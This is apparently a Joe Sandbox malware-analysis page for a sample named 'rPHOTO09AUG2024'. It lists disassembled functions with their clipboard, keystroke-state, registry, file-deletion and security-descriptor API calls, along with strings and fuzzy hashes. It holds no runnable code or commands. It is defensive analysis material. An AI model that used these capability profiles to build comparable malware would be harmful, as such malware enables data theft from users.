Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2b5b5757399c80e71857aeb1a227a8accf187c72bacb10cc9c2d0a9e35f1cfcf
Instruction ID: a3dab3a5f6ce86f9e359272a2f75254157fdef563b442ff89c4e79b164f86f85
Opcode Fuzzy Hash: 2b5b5757399c80e71857aeb1a227a8accf187c72bacb10cc9c2d0a9e35f1cfcf
Instruction Fuzzy Hash: 38814A7190020AAFDF11DFA4DC45EEEBBB9EF05714F18416AF910A62A1DB318E15EB70

Function 00DB425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00DCF910), ref: 00DB4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00DB4292
GetClipboardData.USER32(0000000D), ref: 00DB429A
CloseClipboard.USER32 ref: 00DB42A6
GlobalLock.KERNEL32(00000000), ref: 00DB42C2
CloseClipboard.USER32 ref: 00DB42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00DB42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00DB42EE
GetClipboardData.USER32(00000001), ref: 00DB42F6
GlobalLock.KERNEL32(00000000), ref: 00DB4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00DB4337
CloseClipboard.USER32 ref: 00DB4447

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 751a6ade41e258a0497580675379891ad07626c6e94931cffaabcc25ca51fec0
Instruction ID: bcec2012b7a252ce3d2bfbf640cd4acb332cf6ca1139e886976d7e3e2c62fb4e
Opcode Fuzzy Hash: 751a6ade41e258a0497580675379891ad07626c6e94931cffaabcc25ca51fec0
Instruction Fuzzy Hash: 91518771244303ABD701EF64EC86FAEB7A9EF84B01F044529F596D22A2DF70D9058B76

Function 00DAC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DAC9F8
FindClose.KERNEL32(00000000), ref: 00DACA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DACA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DACA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACAAF
__swprintf.LIBCMT ref: 00DACAFB
__swprintf.LIBCMT ref: 00DACB3E

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

__swprintf.LIBCMT ref: 00DACB92

Part of subcall function 00D638D8: __woutput_l.LIBCMT ref: 00D63931

__swprintf.LIBCMT ref: 00DACBE0

Part of subcall function 00D638D8: __flsbuf.LIBCMT ref: 00D63953
Part of subcall function 00D638D8: __flsbuf.LIBCMT ref: 00D6396B

__swprintf.LIBCMT ref: 00DACC2F
__swprintf.LIBCMT ref: 00DACC7E
__swprintf.LIBCMT ref: 00DACCCD

Strings

%4d, xrefs: 00DACB38
%4d%02d%02d%02d%02d%02d, xrefs: 00DACAF5
%02d, xrefs: 00DACB86, 00DACB90, 00DACBDE, 00DACC2D, 00DACC7C, 00DACCCB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: a29bc71e3308eb41349b4f2017d817e38979e2282b363b1a8fc60a2b43ecfb72
Instruction ID: 4f0c708b294178a0721010e69f5b1626db0849322e4242aa8df282571fc25f80
Opcode Fuzzy Hash: a29bc71e3308eb41349b4f2017d817e38979e2282b363b1a8fc60a2b43ecfb72
Instruction Fuzzy Hash: D1A13EB2508305ABC700EF65C896DAFB7ECEF95700F404919B586D7192EB34DA08CB72

Function 00DAF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00DAF221
_wcscmp.LIBCMT ref: 00DAF236
_wcscmp.LIBCMT ref: 00DAF24D
GetFileAttributesW.KERNEL32(?), ref: 00DAF25F
SetFileAttributesW.KERNEL32(?,?), ref: 00DAF279
FindNextFileW.KERNEL32(00000000,?), ref: 00DAF291
FindClose.KERNEL32(00000000), ref: 00DAF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF2B8
_wcscmp.LIBCMT ref: 00DAF2DF
_wcscmp.LIBCMT ref: 00DAF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF308
SetCurrentDirectoryW.KERNEL32(00DFA5A0), ref: 00DAF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF330
FindClose.KERNEL32(00000000), ref: 00DAF33D
FindClose.KERNEL32(00000000), ref: 00DAF34F

Strings

*.*, xrefs: 00DAF2B3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 50062dbb17ecfc337bc3bb09db84ae9e939b2088c52d756d7fb8b31074556e1b
Instruction ID: 412bd2b61c7c52891cf47605d44e29002401a1af4d3709670aca40b91657cf92
Opcode Fuzzy Hash: 50062dbb17ecfc337bc3bb09db84ae9e939b2088c52d756d7fb8b31074556e1b
Instruction Fuzzy Hash: 3231BF7650021A6FDF10DBB4DC48EEEB3ADEF4A361F1442B5E904D31A0EB30DA458A74

Function 00DC0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00DCF910,00000000,?,00000000,?,?), ref: 00DC0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DC0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DC0D1D
RegCloseKey.ADVAPI32(?), ref: 00DC103D
RegCloseKey.ADVAPI32(00000000), ref: 00DC104A

Strings

REG_QWORD, xrefs: 00DC0F8B
REG_MULTI_SZ, xrefs: 00DC0E05
REG_SZ, xrefs: 00DC0D5B
REG_BINARY, xrefs: 00DC0FD8
REG_DWORD, xrefs: 00DC0F0E
REG_EXPAND_SZ, xrefs: 00DC0CBA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c4ca5c52964b5646a15c7dab05edb910cbb1dbfccb24ae78669e7b2fea950154
Instruction ID: 7702cad749a391763245f02241e327a4c7c725866b43a8be9ef1e69c184c2544
Opcode Fuzzy Hash: c4ca5c52964b5646a15c7dab05edb910cbb1dbfccb24ae78669e7b2fea950154
Instruction Fuzzy Hash: E2025E752006129FCB14DF25C895E2ABBE5FF89714F04885DF89A9B362CB30ED45CBA1

Function 00DAF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00DAF37E
_wcscmp.LIBCMT ref: 00DAF393
_wcscmp.LIBCMT ref: 00DAF3AA

Part of subcall function 00DA45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DA45DC

FindNextFileW.KERNEL32(00000000,?), ref: 00DAF3D9
FindClose.KERNEL32(00000000), ref: 00DAF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00DAF400
_wcscmp.LIBCMT ref: 00DAF427
_wcscmp.LIBCMT ref: 00DAF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00DAF450
SetCurrentDirectoryW.KERNEL32(00DFA5A0), ref: 00DAF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DAF478
FindClose.KERNEL32(00000000), ref: 00DAF485
FindClose.KERNEL32(00000000), ref: 00DAF497

Strings

*.*, xrefs: 00DAF3FB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 78511bed90f95f03a014cd894ae745dc07f5db926a918900bdac432ea03dc5f4
Instruction ID: 494659426fb06905a1e55bb8b0df925b116a5410af29cf0de59b07c7963c4b2d
Opcode Fuzzy Hash: 78511bed90f95f03a014cd894ae745dc07f5db926a918900bdac432ea03dc5f4
Instruction Fuzzy Hash: 0631E57250121A6FCF10ABA4EC88EEE77ADDF4A361F1446B5E854E31A0DB70DE44CA74

Function 00D981F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D98766
Part of subcall function 00D9874A: GetLastError.KERNEL32(?,00D9822A,?,?,?), ref: 00D98770
Part of subcall function 00D9874A: GetProcessHeap.KERNEL32(00000008,?,?,00D9822A,?,?,?), ref: 00D9877F
Part of subcall function 00D9874A: HeapAlloc.KERNEL32(00000000,?,00D9822A,?,?,?), ref: 00D98786
Part of subcall function 00D9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9879D

Part of subcall function 00D987E7: GetProcessHeap.KERNEL32(00000008,00D98240,00000000,00000000,?,00D98240,?), ref: 00D987F3
Part of subcall function 00D987E7: HeapAlloc.KERNEL32(00000000,?,00D98240,?), ref: 00D987FA
Part of subcall function 00D987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D98240,?), ref: 00D9880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D9825B
_memset.LIBCMT ref: 00D98270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D9828F
GetLengthSid.ADVAPI32(?), ref: 00D982A0
GetAce.ADVAPI32(?,00000000,?), ref: 00D982DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D982F9
GetLengthSid.ADVAPI32(?), ref: 00D98316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D98325
HeapAlloc.KERNEL32(00000000), ref: 00D9832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D9834D
CopySid.ADVAPI32(00000000), ref: 00D98354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D98385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D983AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D983BF

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 10d318c1a42550652e955966cbe577dc57e1deb76f476017a3704b653d84f5fd
Instruction ID: debf65301a1ed986a78980f4731ed2a23e2956baca57caf1297cebb9afda03b9
Opcode Fuzzy Hash: 10d318c1a42550652e955966cbe577dc57e1deb76f476017a3704b653d84f5fd
Instruction Fuzzy Hash: AF613B7190420AABDF009FA4DC45EEEBBB9FF05B00F14816AE815E7291DB359A05EB70

Function 00D56843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_MATCH=, xrefs: 00D915A9
BSR_UNICODE), xrefs: 00D91771
NO_AUTO_POSSESS), xrefs: 00D91567
BSR_ANYCRLF), xrefs: 00D91757
ANY), xrefs: 00D91717
CR), xrefs: 00D916C0
ANYCRLF), xrefs: 00D91734
UCP), xrefs: 00D91546
UTF), xrefs: 00D91533
NO_START_OPT), xrefs: 00D91588
CRLF), xrefs: 00D916FA
LIMIT_RECURSION=, xrefs: 00D91635
UTF16), xrefs: 00D91508
LF), xrefs: 00D916DD

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: e24933e7c3c8dd2e3d379f9bc047a060799441a01fed47c01324e0418795beac
Instruction ID: 8d7467c6cc712360505a4e219f85f475df1199402103523f1f4c552196b3b111
Opcode Fuzzy Hash: e24933e7c3c8dd2e3d379f9bc047a060799441a01fed47c01324e0418795beac
Instruction Fuzzy Hash: 44726E75E0021A9BDF14CF58C8807AEB7B5EF48311F54816AED59EB280EB70DD45CBA0

Function 00DC0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DC0038,?,?), ref: 00DC10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0737

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00DC07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DC086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DC0AAD
RegCloseKey.ADVAPI32(00000000), ref: 00DC0ABA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 5aeec5e5083647453fbf5fb18997b769c2db9b816db2950c29263dbc5010ef01
Instruction ID: c6fb0b10ae9e116bde2f849de1757349305441deea4b6492cdc4489df9f331e0
Opcode Fuzzy Hash: 5aeec5e5083647453fbf5fb18997b769c2db9b816db2950c29263dbc5010ef01
Instruction Fuzzy Hash: 7DE13E31204311EFCB14DF25C895E6BBBE5EF89714F08856DF899DB2A2DA30E905CB61

Function 00DA0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DA0241
GetAsyncKeyState.USER32(000000A0), ref: 00DA02C2
GetKeyState.USER32(000000A0), ref: 00DA02DD
GetAsyncKeyState.USER32(000000A1), ref: 00DA02F7
GetKeyState.USER32(000000A1), ref: 00DA030C
GetAsyncKeyState.USER32(00000011), ref: 00DA0324
GetKeyState.USER32(00000011), ref: 00DA0336
GetAsyncKeyState.USER32(00000012), ref: 00DA034E
GetKeyState.USER32(00000012), ref: 00DA0360
GetAsyncKeyState.USER32(0000005B), ref: 00DA0378
GetKeyState.USER32(0000005B), ref: 00DA038A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b02969ed9430d7e2baa1f512c7bd9cb7f74111428c83497612a76284d475fe0d
Instruction ID: 1073955322f2d86abfbdc72f0db21a5d6530a9aea1da52e2ff22c6d2aba91232
Opcode Fuzzy Hash: b02969ed9430d7e2baa1f512c7bd9cb7f74111428c83497612a76284d475fe0d
Instruction Fuzzy Hash: 5F41A8345047CA6EFF319B64C8087E5BEA1AF17340F0C809DD6C6466C2EBA599C887B6

Function 00DB86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

CoInitialize.OLE32 ref: 00DB8718
CoUninitialize.OLE32 ref: 00DB8723
CoCreateInstance.OLE32(?,00000000,00000017,00DD2BEC,?), ref: 00DB8783
IIDFromString.OLE32(?,?), ref: 00DB87F6
VariantInit.OLEAUT32(?), ref: 00DB8890
VariantClear.OLEAUT32(?), ref: 00DB88F1

Strings

Failed to create object, xrefs: 00DB878E, 00DB8844
NULL Pointer assignment, xrefs: 00DB87C8
Invalid parameter, xrefs: 00DB880F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 08ee7a4bdea7cf2dfbec215553bd93db3f0f8deb71c6e16f7def56f0c0c0f1a6
Instruction ID: 25fe701fd76aff09daa03c8f5df2e4d64fc22d3ae22896426289f03111129e78
Opcode Fuzzy Hash: 08ee7a4bdea7cf2dfbec215553bd93db3f0f8deb71c6e16f7def56f0c0c0f1a6
Instruction Fuzzy Hash: 56618C74608302DFD710DF65D848AAABBE8EF49714F144819F9869B291CB70ED48DBB2

Function 00DB4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00DB447F
EmptyClipboard.USER32 ref: 00DB4485
GlobalAlloc.KERNEL32(00000002,?), ref: 00DB449A
CloseClipboard.USER32 ref: 00DB4539

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 1bf2568cfeff60dffaf8b04881fac896987e44a1648a7fb75a45f9ae7c90b5ea
Instruction ID: 6b05f3440f7772c3cf3ced918264417d1663698ab4406fe7db59c79b687e0ba9
Opcode Fuzzy Hash: 1bf2568cfeff60dffaf8b04881fac896987e44a1648a7fb75a45f9ae7c90b5ea
Instruction Fuzzy Hash: 102160352406129FDB10AF65EC59FAAB7A9EF44711F148016F946DB3A2CB74ED00CB74

Function 00DA3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D448A1,?,?,00D437C0,?), ref: 00D448CE

Part of subcall function 00DA4CD3: GetFileAttributesW.KERNEL32(?,00DA3947), ref: 00DA4CD4

FindFirstFileW.KERNEL32(?,?), ref: 00DA3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00DA3B87
MoveFileW.KERNEL32(?,?), ref: 00DA3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00DA3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00DA3BF5

Strings

\*.*, xrefs: 00DA3A8A, 00DA3A93, 00DA3AA8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 942566a7af155f8bc4f7eac506b8481ec380139e846dc24849cd58996f9e0739
Instruction ID: 68364e768cf404b24f1814ebd33e8945e912eda1d59ca3e5a3a56fdf81f361d6
Opcode Fuzzy Hash: 942566a7af155f8bc4f7eac506b8481ec380139e846dc24849cd58996f9e0739
Instruction Fuzzy Hash: 6B516E31801259ABCF15EBA0DD929EDB77AEF16300F684169F446B7192DF206F09CB70

Function 00DAF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00DAF6AB
Sleep.KERNEL32(0000000A), ref: 00DAF6DB
_wcscmp.LIBCMT ref: 00DAF6EF
_wcscmp.LIBCMT ref: 00DAF70A
FindNextFileW.KERNEL32(?,?), ref: 00DAF7A8
FindClose.KERNEL32(00000000), ref: 00DAF7BE

Strings

*.*, xrefs: 00DAF690

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
